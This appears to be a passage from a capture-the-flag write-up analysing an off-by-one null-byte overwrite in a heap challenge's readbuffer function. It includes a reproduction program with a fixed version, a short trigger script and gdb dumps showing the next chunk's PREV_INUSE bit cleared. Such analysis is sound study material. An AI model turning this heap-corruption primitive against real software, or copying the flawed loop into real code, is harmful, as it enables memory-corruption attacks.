vuln
In edit, the readbuffer function is called to edit the content:
```c
// readbuffer(a1, a2): a1 = destination buffer (the letter's content chunk), a2 = length.
// Signature reconstructed from the decompiled body; the loop runs a2 + 1 times.
__int64 readbuffer(__int64 a1, int a2)
{
  char buf;
  int i;
  for ( i = 0; i <= a2; ++i )              // bug: <= instead of <, so i reaches a2
  {
    if ( read(0, &buf, 1uLL) < 0 )
      return 0xFFFFFFFFLL;
    if ( buf == 10 )                        // newline: terminate at a1[i], i may equal a2
    {
      *(_BYTE *)((signed int)i + a1) = 0;
      return i;
    }
    *(_BYTE *)(a1 + (signed int)i) = buf;   // writes a1[a2] on the last iteration
  }
  *(_BYTE *)((signed int)i - 1LL + a1) = 0; // i == a2 + 1 here, so this is a1[a2]
  return i;
}
```
It terminates the input string with a 0 byte, but because the loop runs up to i == a2, that terminator lands at a1[a2], one byte past an a2-byte buffer; and a1 points directly into the allocated heap chunk, so the byte it clobbers is the low byte of the next chunk's size field.
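The off-by-one is easier to see in a stand-alone reproduction. The following C program is an added example, not code from the challenge binary or from this writeup: it re-implements readbuffer's loop with an in-memory stand-in for read(0, ...), lays out a constructed buffer the way the gdb dump in the test section shows two adjacent 0x100 chunks (user data at offset 0, the next chunk's size field 0x101 at offset 0xf8), and places the decompiled loop beside a hardened version that reserves the last byte for the terminator. The names readbuffer_vuln, readbuffer_fixed, read_one, layout and size_after are mine.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CHUNK_USER 0xf8   /* usable bytes of a 0x100 chunk, as in the writeup */

/* Constructed stand-in for read(0, &buf, 1): pulls one byte from an
 * in-memory string so the example runs offline. Returns -1 when exhausted. */
struct input { const char *data; size_t len; size_t pos; };

static int read_one(struct input *in, char *out) {
    if (in->pos >= in->len) return -1;
    *out = in->data[in->pos++];
    return 1;
}

/* Same control flow as the decompiled readbuffer: i runs 0..a2 inclusive,
 * so with an a2-byte input both exit paths store the terminator at a1[a2]. */
static long readbuffer_vuln(char *a1, int a2, struct input *in) {
    char buf;
    int i;
    for (i = 0; i <= a2; ++i) {
        if (read_one(in, &buf) < 0) return -1;
        if (buf == '\n') { a1[i] = 0; return i; }
        a1[i] = buf;
    }
    a1[i - 1] = 0;
    return i;
}

/* Hardened variant: never index past a2 - 1 and reserve the last byte for
 * the terminator, so at most a2 bytes of the caller's buffer are written. */
static long readbuffer_fixed(char *a1, int a2, struct input *in) {
    char buf;
    int i;
    if (a2 <= 0) return -1;
    for (i = 0; i < a2 - 1; ++i) {
        if (read_one(in, &buf) < 0) return -1;
        if (buf == '\n') break;
        a1[i] = buf;
    }
    a1[i] = 0;
    return i;
}

/* Constructed layout mirroring the gdb dump: victim user data at heap[0..0xf8),
 * next chunk's size field (0x101 = 0x100 | PREV_INUSE) at heap[0xf8..0x100).
 * Little-endian byte order is assumed, as on the x86-64 target. */
static void layout(unsigned char *heap) {
    uint64_t size = 0x101;
    memset(heap, 0, 0x100 + 8);
    memcpy(heap + CHUNK_USER, &size, sizeof size);
}

static uint64_t next_size(const unsigned char *heap) {
    uint64_t s;
    memcpy(&s, heap + CHUNK_USER, sizeof s);
    return s;
}

/* Feeds 0xf8 'A' bytes plus a newline (the edit_letter payload) through one
 * readbuffer variant and returns the next chunk's size field afterwards. */
static uint64_t size_after(long (*rb)(char *, int, struct input *)) {
    unsigned char heap[0x100 + 8];
    char payload[CHUNK_USER + 1];
    memset(payload, 'A', CHUNK_USER);
    payload[CHUNK_USER] = '\n';
    struct input in = { payload, sizeof payload, 0 };
    layout(heap);
    (void)rb((char *)heap, CHUNK_USER, &in);
    return next_size(heap);
}

int main(void) {
    printf("vulnerable: next chunk size 0x%llx\n",
           (unsigned long long)size_after(readbuffer_vuln));   /* 0x100 */
    printf("fixed:      next chunk size 0x%llx\n",
           (unsigned long long)size_after(readbuffer_fixed));  /* 0x101 */
    return 0;
}
```

The vulnerable loop turns 0x101 into 0x100 exactly as the gdb dump does: the stored terminator clears the low byte, and with it the PREV_INUSE bit of the following chunk. The fixed loop leaves the size field untouched because it can never write beyond a1[a2 - 1].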
Test
```python
# new_letter / edit_letter are the writeup's menu wrappers (not shown here)
new_letter(0xf8)
new_letter(0xf8)
new_letter(0xf8)
edit_letter(1, 'A'*0xf8)
```
In gdb the heap then looks like this:
- Before edit:

```
0x603008: 0x0000000000000101 0x0000000000000000
0x603018: 0x0000000000000000 0x0000000000000000
...
0x6030f8: 0x0000000000000000 0x0000000000000000
0x603108: 0x0000000000000101 0x0000000000000000
0x603118: 0x0000000000000000 0x0000000000000000
...
0x603208: 0x0000000000000101 0x0000000000000000
...
```
- After edit:

```
0x603008: 0x0000000000000101 0x0000000000000000
0x603018: 0x0000000000000000 0x0000000000000000
...
0x6030f8: 0x0000000000000000 0x0000000000000000
0x603108: 0x0000000000000101 0x4141414141414141
0x603118: 0x4141414141414141 0x4141414141414141
...
0x6031f8: 0x4141414141414141 0x4141414141414141
0x603208: 0x0000000000000100 0x0000000000000000
0x603218: 0x0000000000000000 0x0000000000000000
```
The 0x101 at 0x603208 has been overwritten with 0x100: the low (PREV_INUSE) bit of the next chunk's size field is cleared, so the heap chunk is now flagged as free.